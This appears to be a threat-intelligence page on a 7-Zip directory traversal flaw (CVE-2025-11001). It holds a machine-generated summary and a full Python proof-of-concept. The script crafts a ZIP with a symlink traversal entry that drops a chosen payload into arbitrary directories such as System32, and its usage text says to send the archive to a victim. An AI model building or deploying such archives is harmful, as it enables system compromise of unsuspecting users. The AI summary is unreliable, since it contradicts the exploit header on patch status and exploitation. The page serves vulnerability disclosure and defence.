7-Zip 24.00 - Directory Traversal
7-Zip 24.00 - Directory Traversal
AI Analysis
Technical Summary
The 7-Zip 24.00 application contains a directory traversal vulnerability that can be exploited locally to write files outside the target extraction directory. This can lead to overwriting or placing files in arbitrary locations on the filesystem. Exploit code written in Python is publicly available, indicating proof of concept. No affected versions list or patch information is provided, and there is no indication of known exploits in the wild.
Potential Impact
Successful exploitation could allow an attacker with local access to write files to arbitrary locations on the system, potentially leading to privilege escalation or system compromise depending on the context and file locations targeted.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a fix is available, avoid extracting untrusted archives with 7-Zip 24.00 or use alternative extraction tools that are not vulnerable.
Indicators of Compromise
- exploit-code: # Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP # Date: 2025-11-22 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.7-zip.org # Software Link: https://www.7-zip.org/download.html # Version: 7-Zip < 25.00 # Tested on: Windows 10 / Windows 11 (7-Zip 24.xx) # CVE: CVE-2025-11001 # CVSS: 8.8 (High) - draft estimation # Category: Local Privilege Escalation / Remote Code Execution # Platform: Windows # CRITICAL: Yes - Public exploit available, active exploitation reported # Including: Directory Traversal via crafted symlink entry in ZIP archive # Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator # Fix: Upgrade to 7-Zip 25.00 or later # Advisory: https://www.7-zip.org/history.txt # Patch: https://github.com/ip7z/7zip/releases/tag/25.00 # Target: Windows systems running vulnerable 7-Zip versions import struct import os import argparse import sys def build_zip(target_path, payload_file, output_zip): if not os.path.isfile(payload_file): print(f"[-] Payload file not found: {payload_file}") sys.exit(1) payload_name = os.path.basename(payload_file) payload_data = open(payload_file, "rb").read() target = target_path.replace("\\", "/").strip("/") + "/" traversal = "../../../../" + target with open(output_zip, "wb") as f: offset = 0 symlink_name = "evil.lnk" symlink_target = traversal.encode() + b"\x00" symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target symlink_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0x800, 0, 0, 0, 0, 0, 0, len(symlink_name), len(symlink_extra)) f.write(symlink_header) f.write(symlink_name.encode()) f.write(symlink_extra) f.write(b"") symlink_central_offset = offset offset += len(symlink_header) + len(symlink_name) + len(symlink_extra) payload_header = struct.pack("<IHHHHHHIIIHH", 0x04034b50, 20, 0x800, 0, 0, 0, 0, len(payload_data), len(payload_data), len(payload_name), 0) f.write(payload_header) f.write(payload_name.encode()) f.write(payload_data) payload_central_offset = offset offset += len(payload_header) + len(payload_name) + len(payload_data) cd_offset = offset f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0, 0, 0, len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset)) f.write(symlink_name.encode()) f.write(symlink_extra) f.write(struct.pack("<IHHHHHHIIIHHHHHII", 0x02014b50, 0x0317, 20, 0x800, 0, 0, 0, 0, len(payload_data), len(payload_data), len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset)) f.write(payload_name.encode()) f.write(struct.pack("<IHHHHIIH", 0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0)) print(f"[+] Malicious archive created: {output_zip}") print(f"[+] Target path : {target_path}") print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)") print(f"[+] Final write location : {target_path}\\{payload_name}") print("\n[*] Usage:") print(" 1. Send the ZIP file to the victim") print(" 2. Victim must run 7-Zip < 25.00 as Administrator") print(" 3. Victim opens and extracts the ZIP → payload dropped silently") print(" 4. Achievement unlocked") if __name__ == "__main__": banner = """ CVE-2025-11001 - 7-Zip Directory Traversal PoC Author: Mohammed Idrees Banyamer (@banyamer_security) """ print(banner) parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00") parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)") parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)") parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)") args = parser.parse_args() build_zip(args.target, args.payload, args.output)
7-Zip 24.00 - Directory Traversal
Description
7-Zip 24.00 - Directory Traversal
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The 7-Zip 24.00 application contains a directory traversal vulnerability that can be exploited locally to write files outside the target extraction directory. This can lead to overwriting or placing files in arbitrary locations on the filesystem. Exploit code written in Python is publicly available, indicating proof of concept. No affected versions list or patch information is provided, and there is no indication of known exploits in the wild.
Potential Impact
Successful exploitation could allow an attacker with local access to write files to arbitrary locations on the system, potentially leading to privilege escalation or system compromise depending on the context and file locations targeted.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a fix is available, avoid extracting untrusted archives with 7-Zip 24.00 or use alternative extraction tools that are not vulnerable.
Technical Details
- Edb Id
- 52501
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for 7-Zip 24.00 - Directory Traversal
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP # Date: 2025-11-22 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.7-zip.org # Software Link: https://www.7-zip.org/download.html # Version: 7-Zip < 25.00 # Tested on: Windows 10 / Windows 11 (7-Zip 24.xx) # CVE: CVE-2025-11001 # CVSS: 8.8 (High) - draft estimation # Category: Local Privilege Escalation /... (3965 more characters)
Threat ID: 69d842c21cc7ad14da3f5b24
Added to database: 4/10/2026, 12:22:26 AM
Last enriched: 4/10/2026, 12:22:57 AM
Last updated: 4/10/2026, 8:31:03 AM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.